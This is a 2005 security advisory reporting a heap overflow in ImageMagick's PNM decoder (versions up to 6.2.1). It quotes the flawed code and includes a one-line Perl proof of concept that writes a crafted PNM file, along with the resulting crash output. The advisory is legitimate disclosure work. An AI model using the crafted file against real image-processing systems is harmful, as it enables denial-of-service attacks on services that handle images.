[Overflow.pl] ImageMagick ReadPNMImage() Heap Overflow

Overflow Security Advisory #3

ImageMagick ReadPNMImage() Heap Overflow

Vendor: ImageMagick (http://www.imagemagick.org)
Affected version: 6.x up to and including 6.2.1
Vendor status: Fixed version released (6.2.2)

Author: Damian Put <pucik_at_overflow.pl>
URL: http://www.overflow.pl/adv/imheapoverflow.txt
Date: 25.04.2005

1. Background

ImageMagick is a free software suite to create, edit, and compose bitmap images.
 It can read, convert and write images in a large variety of formats.

http://www.imagemagick.org

2. Description

Remote exploitation of a heap overflow vulnerability could allow execution of
arbitrary code or couse denial of service.

A heap overflow exists in ReadPNMImage() function, that is used to decode
a PNM image files. The vulnerable code is:

coders/pnm.c:

static Image *ReadPNMImage(const ImageInfo *image_info,ExceptionInfo *exception)
{
...
    if ((format == '1') || (format == '4'))
      max_value=1; /* bitmap */
    else
      max_value=PNMInteger(image,10);
    image->depth=max_value < 256 ? 8UL : QuantumDepth;
    if ((format != '3') && (format != '6'))
      {
        image->storage_class=PseudoClass;
        image->colors=(unsigned long) (max_value >= MaxColormapSize ?
          MaxColormapSize : max_value+1);
      }
...
        if (AllocateImageColormap(image,image->colors) == MagickFalse)
          ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
        if (format == '7')
          {
            /*
              Initialize 332 colormap.
            */
            i=0;
            for (pixel.red=0; pixel.red < 8; pixel.red++)
              for (pixel.green=0; pixel.green < 8; pixel.green++)
                for (pixel.blue=0; pixel.blue < 4; pixel.blue++)
                {
                  image->colormap[i].red=ScaleXToQuantum(pixel.red,0x07);
                  image->colormap[i].green=ScaleXToQuantum(pixel.green,0x07);
                  image->colormap[i].blue=ScaleXToQuantum(pixel.blue,0x03);
                  i++;
                }
          }
...

We can manipulate with image->colors value, becouse it`s atributted to "max_value"
or MaxColormapSize variable. Allocation of memory for image->colormap is based on
image->colors variable (AllocateImageColormap() function). If value of "image->colors"
is for example 1, we allocate only 1*sizeof(PixelPacket) bytes of memory. Next, when
format of PNM file is "7", image->colormap buffer is initialized by 332 colormaps.
If image->colors*sizeof(PixelPacket) bytes are not enought for it, heap structures are
overflowed. We cannot control contents of this buffer, so execute of arbitrary code is
very difficult or imposible, but we can crash it in easy way.

3. PoC

Example crafted PNM file:

bash$ perl -e 'print "P7\n1\n1 1\n1"' > vuln.pnm

We can test vulnerability with "mogrify" - standard ImageMagick utility:

bash$ mogrify vuln.pnm
*** glibc detected *** malloc(): memory corruption: 0x08701198 ***
Przerwane (core dumped)
bash$
Received on Apr 25 2005